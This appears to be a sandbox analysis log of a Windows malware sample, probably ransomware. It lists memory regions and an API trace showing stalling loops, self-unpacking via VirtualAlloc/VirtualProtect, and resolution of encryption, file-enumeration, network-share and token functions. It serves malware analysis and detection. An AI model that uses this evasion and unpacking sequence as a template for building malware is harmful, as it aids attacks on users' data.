"\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 943 start_va = 0x2e80000 end_va = 0x2ee5fff entry_point = 0x2e80000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 944 start_va = 0x2ef0000 end_va = 0x2ef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ef0000" filename = "" Region: id = 945 start_va = 0x73440000 end_va = 0x73452fff entry_point = 0x73440000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 946 start_va = 0x755b0000 end_va = 0x755c1fff entry_point = 0x755b0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 947 start_va = 0x76940000 end_va = 0x76adcfff entry_point = 0x76940000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1259 start_va = 0x3880000 end_va = 0x38bffff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 1260 start_va = 0x38c0000 end_va = 0x38fffff entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 1261 start_va = 0x73ed0000 end_va = 0x73f1bfff entry_point = 0x73ed0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1262 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1263 start_va = 0x2df0000 end_va = 0x2df0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002df0000" filename = "" Region: id = 1264 start_va = 0x2f00000 end_va = 0x2f01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f00000" filename = "" Region: id = 1265 start_va = 0x736f0000 end_va = 0x738b2fff entry_point = 0x736f0000 region_type = mapped_file name = "d3d9.dll" filename = "\\Windows\\SysWOW64\\d3d9.dll" (normalized: "c:\\windows\\syswow64\\d3d9.dll") Region: id = 1266 start_va = 0x73ba0000 end_va = 0x73d2ffff entry_point = 0x73ba0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 1267 start_va = 0x73d30000 end_va = 0x73d39fff entry_point = 0x73d30000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 1268 start_va = 0x73d40000 end_va = 0x73d45fff entry_point = 0x73d40000 region_type = mapped_file name = "d3d8thk.dll" filename = "\\Windows\\SysWOW64\\d3d8thk.dll" (normalized: "c:\\windows\\syswow64\\d3d8thk.dll") Region: id = 1269 start_va = 0x73d50000 end_va = 0x73d5cfff entry_point = 0x73d50000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1270 start_va = 0x73d60000 end_va = 0x73ec5fff entry_point = 0x73d60000 region_type = mapped_file name = "photoviewer.dll" filename = "\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoviewer.dll") Region: id = 1271 start_va = 0x74050000 end_va = 0x7408bfff entry_point = 0x74053089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 1272 start_va = 0x74540000 end_va = 0x74548fff entry_point = 0x74541220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1304 start_va = 0x3900000 end_va = 0x3900fff entry_point = 0x3900000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 1305 start_va = 0x39c0000 end_va = 0x39cffff entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 1306 start_va = 0x73b90000 end_va = 0x73b9bfff entry_point = 0x73b90000 region_type = mapped_file name = "photobase.dll" filename = "\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photobase.dll") Region: id = 1307 start_va = 0x74550000 end_va = 0x7455dfff entry_point = 0x74551235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 1399 start_va = 0x3910000 end_va = 0x394ffff entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 1400 start_va = 0x3950000 end_va = 0x398ffff entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 1401 start_va = 0x73f20000 end_va = 0x73f4afff entry_point = 0x73f3d3fe region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll") Region: id = 1402 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 1454 start_va = 0x3990000 end_va = 0x3991fff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Thread: id = 35 os_tid = 0xb6c [0048.044] SetEnvironmentVariableA (lpName="uulkmabdgqks", lpValue="uulkmabdgqks") returned 1 [0048.057] SetEnvironmentVariableA (lpName="uulkmabdgqks", lpValue="uulkmabdgqks") returned 1 [0048.057] GetEnvironmentVariableW (in: lpName="杧晱汳扭", lpBuffer=0x413181, nSize=0xf | out: lpBuffer="") returned 0x0 [0048.057] GetEnvironmentVariableW (in: lpName="杧晱汳扭", lpBuffer=0x413181, nSize=0xf | out: lpBuffer="") returned 0x0 [0048.057] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x751d0000 [0048.057] GetEnvironmentVariableW (in: lpName="杧晱汳扭", lpBuffer=0x413181, nSize=0xf | out: lpBuffer="") returned 0x0 [0048.057] LoadLibraryA (lpLibFileName="eappgnui.dll") returned 0x74ab0000 [0048.134] SetEnvironmentVariableA (lpName="uulkmabdgqks", lpValue="uulkmabdgqks") returned 1 [0048.134] SetEnvironmentVariableA (lpName="uulkmabdgqks", lpValue="uulkmabdgqks") returned 1 [0048.134] LoadLibraryA (lpLibFileName="gfppgnui.dll") returned 0x0 [0048.147] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0049.152] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0050.166] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0051.206] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0052.210] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0053.224] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0054.238] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0055.252] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0056.268] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0057.285] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0058.294] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0059.308] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0060.322] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0061.337] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0062.350] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0063.364] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0064.379] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0065.392] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0066.407] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0067.420] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0068.434] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0069.448] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0070.462] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0071.476] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0072.490] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0073.507] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0074.519] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0075.532] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0076.549] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0077.560] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0x3e8) returned 0x102 [0078.574] GetEnvironmentVariableW (in: lpName="杧晱汳扭", lpBuffer=0x413181, nSize=0xf | out: lpBuffer="") returned 0x0 [0078.576] GetProcAddress (hModule=0x751d0000, lpProcName="WriteProcessMemory") returned 0x751fd9e0 [0078.576] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x413104, lpBuffer=0x74ab0190*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x74ab0190*, lpNumberOfBytesWritten=0x0) returned 1 [0078.576] GetComputerNameExA (in: NameType=0x0, lpBuffer=0x413190, nSize=0x413198 | out: lpBuffer="YKYD69Q", nSize=0x413198) returned 1 [0078.576] GetProcAddress (hModule=0x751d0000, lpProcName="HeapCreate") returned 0x751e4a2d [0078.578] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x751d0000 [0078.602] GetProcAddress (hModule=0x751d0000, lpProcName="HeapAlloc") returned 0x773de026 [0078.602] GetProcAddress (hModule=0x751d0000, lpProcName="HeapFree") returned 0x751e14c9 [0078.602] GetProcAddress (hModule=0x751d0000, lpProcName="GetTickCount") returned 0x751e110c [0078.602] VirtualAlloc (lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x250000 [0078.603] VirtualAlloc (lpAddress=0x0, dwSize=0x81600, flAllocationType=0x1000, flProtect=0x4) returned 0x310000 [0078.616] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x18ff40 | out: lpflOldProtect=0x18ff40*=0x2) returned 1 [0078.616] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x18ff40 | out: lpflOldProtect=0x18ff40*=0x4) returned 1 [0078.616] VirtualProtect (in: lpAddress=0x401000, dwSize=0x77000, flNewProtect=0x4, lpflOldProtect=0x18ff20 | out: lpflOldProtect=0x18ff20*=0x10) returned 1 [0078.623] VirtualProtect (in: lpAddress=0x401000, dwSize=0x77000, flNewProtect=0x20, lpflOldProtect=0x18ff20 | out: lpflOldProtect=0x18ff20*=0x4) returned 1 [0078.623] VirtualProtect (in: lpAddress=0x478000, dwSize=0x7000, flNewProtect=0x4, lpflOldProtect=0x18ff20 | out: lpflOldProtect=0x18ff20*=0x80) returned 1 [0078.624] VirtualProtect (in: lpAddress=0x478000, dwSize=0x7000, flNewProtect=0x2, lpflOldProtect=0x18ff20 | out: lpflOldProtect=0x18ff20*=0x4) returned 1 [0078.624] VirtualProtect (in: lpAddress=0x47f000, dwSize=0x4000, flNewProtect=0x4, lpflOldProtect=0x18ff20 | out: lpflOldProtect=0x18ff20*=0x80) returned 1 [0078.624] VirtualProtect (in: lpAddress=0x47f000, dwSize=0x4000, flNewProtect=0x4, lpflOldProtect=0x18ff20 | out: lpflOldProtect=0x18ff20*=0x4) returned 1 [0078.624] VirtualProtect (in: lpAddress=0x483000, dwSize=0x3000, flNewProtect=0x4, lpflOldProtect=0x18ff20 | out: lpflOldProtect=0x18ff20*=0x80) returned 1 [0078.624] VirtualProtect (in: lpAddress=0x483000, dwSize=0x3000, flNewProtect=0x2, lpflOldProtect=0x18ff20 | out: lpflOldProtect=0x18ff20*=0x4) returned 1 [0078.624] VirtualProtect (in: lpAddress=0x486000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff20 | out: lpflOldProtect=0x18ff20*=0x80) returned 1 [0078.624] VirtualProtect (in: lpAddress=0x486000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff20 | out: lpflOldProtect=0x18ff20*=0x4) returned 1 [0078.625] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x751d0000 [0078.625] VirtualProtect (in: lpAddress=0x4780b4, dwSize=0x1ac, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="WaitForSingleObject") returned 0x751e1136 [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="MultiByteToWideChar") returned 0x751e192e [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="WideCharToMultiByte") returned 0x751e170d [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="GetLocaleInfoA") returned 0x751fd5e5 [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="GetTempFileNameW") returned 0x7520d1b6 [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="GetVolumeNameForVolumeMountPointA") returned 0x7526b71d [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="GetWindowsDirectoryA") returned 0x75202b0a [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="CreateProcessW") returned 0x751e103d [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="FindFirstFileW") returned 0x751e4435 [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="GetCurrentProcess") returned 0x751e1809 [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="FindClose") returned 0x751e4442 [0078.625] GetProcAddress (hModule=0x751d0000, lpProcName="DeviceIoControl") returned 0x751e322f [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="LeaveCriticalSection") returned 0x773d2270 [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="EnterCriticalSection") returned 0x773d22b0 [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="DeleteCriticalSection") returned 0x773e45f5 [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="InitializeCriticalSection") returned 0x773e2c42 [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="GetLogicalDrives") returned 0x751e5371 [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="GetDriveTypeW") returned 0x751e418b [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="GetVolumeInformationW") returned 0x751fc860 [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="GetDiskFreeSpaceExW") returned 0x751fd50f [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="FindNextFileW") returned 0x751e54ee [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="CreateThread") returned 0x751e34d5 [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="LocalFree") returned 0x751e2d3c [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="CreateEventA") returned 0x751e328c [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="GetTempPathW") returned 0x751fd4dc [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="GetModuleFileNameW") returned 0x751e4950 [0078.626] GetProcAddress (hModule=0x751d0000, lpProcName="ExitProcess") returned 0x751e7a10 [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="FindAtomA") returned 0x751fede4 [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="GlobalFindAtomA") returned 0x7520d358 [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="GlobalAddAtomA") returned 0x75200526 [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="AddAtomA") returned 0x751fed6e [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="GetVersionExA") returned 0x751e3519 [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="GetUserDefaultUILanguage") returned 0x751e44ab [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="MulDiv") returned 0x751e1b80 [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="OpenMutexA") returned 0x751fec6f [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="SetThreadPriority") returned 0x751e32bb [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="GetCurrentThread") returned 0x751e17ec [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="CopyFileW") returned 0x7520830d [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="GetUserDefaultLangID") returned 0x751fd5fd [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="GetSystemDefaultLangID") returned 0x7520d346 [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="SetUnhandledExceptionFilter") returned 0x751e87c9 [0078.627] GetProcAddress (hModule=0x751d0000, lpProcName="SetErrorMode") returned 0x751e1b00 [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="CloseHandle") returned 0x751e1410 [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="ReadFile") returned 0x751e3ed3 [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="WriteFile") returned 0x751e1282 [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="FlushFileBuffers") returned 0x751e469b [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="GetFileSizeEx") returned 0x751e59e2 [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="SetFilePointer") returned 0x751e17d1 [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="SetFileTime") returned 0x751fecbb [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="CreateFileW") returned 0x751e3f5c [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="DeleteFileW") returned 0x751e89b3 [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="MoveFileExW") returned 0x751f9b2d [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="GetSystemTimeAsFileTime") returned 0x751e3509 [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="lstrlenA") returned 0x751e5a4b [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="LoadLibraryW") returned 0x751e492b [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="HeapReAlloc") returned 0x773f1f6e [0078.628] GetProcAddress (hModule=0x751d0000, lpProcName="GetCurrentProcessId") returned 0x751e11f8 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="QueryPerformanceCounter") returned 0x751e1725 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="GetFileType") returned 0x751e3531 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x751e1916 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="SetHandleCount") returned 0x751ecb29 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="GetEnvironmentStringsW") returned 0x751e51e3 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="FreeEnvironmentStringsW") returned 0x751e51cb [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="GetModuleFileNameA") returned 0x751e14b1 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="VirtualQuery") returned 0x751e445a [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="GetStringTypeW") returned 0x751e1946 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="LCMapStringW") returned 0x751e17b9 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="SetFileAttributesW") returned 0x751fd4f7 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="GetFileAttributesExW") returned 0x751e4574 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="FreeLibrary") returned 0x751e34c8 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="LoadLibraryA") returned 0x751e49d7 [0078.629] GetProcAddress (hModule=0x751d0000, lpProcName="InterlockedDecrement") returned 0x751e13f0 [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="Sleep") returned 0x751e10ff [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="GetTickCount") returned 0x751e110c [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="GetLastError") returned 0x751e11c0 [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="GetSystemDirectoryW") returned 0x751e5063 [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="VirtualFree") returned 0x751e186e [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="GetProcAddress") returned 0x751e1222 [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="GetModuleHandleA") returned 0x751e1245 [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="VirtualAlloc") returned 0x751e1856 [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="HeapCreate") returned 0x751e4a2d [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="GetStdHandle") returned 0x751e51b3 [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="TerminateProcess") returned 0x751fd802 [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="IsDebuggerPresent") returned 0x751e4a5d [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="UnhandledExceptionFilter") returned 0x7520772f [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="IsValidCodePage") returned 0x751e4493 [0078.630] GetProcAddress (hModule=0x751d0000, lpProcName="GetOEMCP") returned 0x7520d1a1 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="GetACP") returned 0x751e179c [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="GetCPInfo") returned 0x751e5189 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="HeapSize") returned 0x773e3002 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="GetCurrentThreadId") returned 0x751e1450 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="SetLastError") returned 0x751e11a9 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="GetModuleHandleW") returned 0x751e34b0 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="InterlockedIncrement") returned 0x751e1400 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="TlsFree") returned 0x751e3587 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="TlsSetValue") returned 0x751e14fb [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="TlsGetValue") returned 0x751e11e0 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="TlsAlloc") returned 0x751e49ad [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="IsProcessorFeaturePresent") returned 0x751e5235 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="GetStartupInfoW") returned 0x751e4d40 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="HeapSetInformation") returned 0x751e5651 [0078.631] GetProcAddress (hModule=0x751d0000, lpProcName="GetCommandLineA") returned 0x751e51a1 [0078.632] GetProcAddress (hModule=0x751d0000, lpProcName="HeapFree") returned 0x751e14c9 [0078.632] GetProcAddress (hModule=0x751d0000, lpProcName="HeapAlloc") returned 0x773de026 [0078.632] GetProcAddress (hModule=0x751d0000, lpProcName="RaiseException") returned 0x751e58a6 [0078.632] GetProcAddress (hModule=0x751d0000, lpProcName="RtlUnwind") returned 0x7520d1c3 [0078.632] VirtualProtect (in: lpAddress=0x4780b4, dwSize=0x1ac, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.632] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x76f10000 [0078.632] VirtualProtect (in: lpAddress=0x478000, dwSize=0x80, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.632] GetProcAddress (hModule=0x76f10000, lpProcName="CryptEncrypt") returned 0x76f3779b [0078.632] GetProcAddress (hModule=0x76f10000, lpProcName="CryptGenRandom") returned 0x76f1dfc8 [0078.632] GetProcAddress (hModule=0x76f10000, lpProcName="CryptReleaseContext") returned 0x76f1e124 [0078.632] GetProcAddress (hModule=0x76f10000, lpProcName="AllocateAndInitializeSid") returned 0x76f240e6 [0078.632] GetProcAddress (hModule=0x76f10000, lpProcName="SetEntriesInAclA") returned 0x76f615e9 [0078.632] GetProcAddress (hModule=0x76f10000, lpProcName="InitializeSecurityDescriptor") returned 0x76f24620 [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="SetSecurityDescriptorDacl") returned 0x76f2415e [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="FreeSid") returned 0x76f2412e [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="CryptImportKey") returned 0x76f1c532 [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="CryptAcquireContextA") returned 0x76f191dd [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="RegDeleteValueA") returned 0x76f3a4ea [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="RegSetValueExW") returned 0x76f214d6 [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="RegSetValueExA") returned 0x76f214b3 [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="AccessCheck") returned 0x76f1ca3c [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="MapGenericMask") returned 0x76f37a73 [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="DuplicateToken") returned 0x76f1c7e6 [0078.633] GetProcAddress (hModule=0x76f10000, lpProcName="OpenThreadToken") returned 0x76f2432c [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="GetFileSecurityW") returned 0x76f1a94d [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="CryptGetKeyParam") returned 0x76f377cb [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="CryptSetHashParam") returned 0x76f53248 [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="CryptCreateHash") returned 0x76f1df4e [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="CryptDestroyHash") returned 0x76f1df66 [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="CryptGetHashParam") returned 0x76f1df7e [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="CryptHashData") returned 0x76f1df36 [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="SetTokenInformation") returned 0x76f19a92 [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="OpenProcessToken") returned 0x76f24304 [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="EqualSid") returned 0x76f2410b [0078.634] GetProcAddress (hModule=0x76f10000, lpProcName="GetTokenInformation") returned 0x76f2431c [0078.635] GetProcAddress (hModule=0x76f10000, lpProcName="RegCloseKey") returned 0x76f2469d [0078.635] GetProcAddress (hModule=0x76f10000, lpProcName="RegOpenKeyExA") returned 0x76f24907 [0078.635] GetProcAddress (hModule=0x76f10000, lpProcName="CryptDestroyKey") returned 0x76f1c51a [0078.635] VirtualProtect (in: lpAddress=0x478000, dwSize=0x80, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.635] GetModuleHandleA (lpModuleName="MPR.dll") returned 0x0 [0078.635] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74a90000 [0078.653] VirtualProtect (in: lpAddress=0x478260, dwSize=0x14, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.653] GetProcAddress (hModule=0x74a90000, lpProcName="WNetCloseEnum") returned 0x74a92dd6 [0078.653] GetProcAddress (hModule=0x74a90000, lpProcName="WNetAddConnection2W") returned 0x74a94744 [0078.653] GetProcAddress (hModule=0x74a90000, lpProcName="WNetOpenEnumW") returned 0x74a92f06 [0078.653] GetProcAddress (hModule=0x74a90000, lpProcName="WNetEnumResourceW") returned 0x74a93058 [0078.653] VirtualProtect (in: lpAddress=0x478260, dwSize=0x14, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.654] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x75cf0000 